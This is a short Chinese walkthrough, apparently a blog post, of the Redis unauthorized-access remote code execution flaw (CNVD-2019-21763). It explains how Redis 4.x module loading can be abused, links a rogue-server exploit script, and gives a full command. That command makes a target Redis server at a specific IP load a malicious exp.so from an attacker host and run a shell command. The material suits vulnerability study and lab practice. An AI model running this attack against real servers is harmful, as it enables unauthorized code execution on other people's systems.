redis 未授权访问 (CNVD-2019-21763)
描述:
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。作为一个高性能的key-value数据库,Redis在部分场景下对关系数据库起到很好的补充作用。
2019年7月7日,LC/BC的成员Pavel Toporkov在WCTF2019 Final分享会上介绍了Redis新版本的远程命令执行漏洞的利用方式。由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。
首先拉取GitHub上的脚本:https://github.com/vulhub/redis-rogue-getshell.git
按一下操作编译so文件

会得到一个exp.so文件

回到上一级目录执行以下命令:
python3 redis-master.py -r 123.58.224.8 -p 21448 -L <攻击机ip> -P 8888 -f redis-rogue-server/exp.so -c "ls /tmp"


浙公网安备 33010602011771号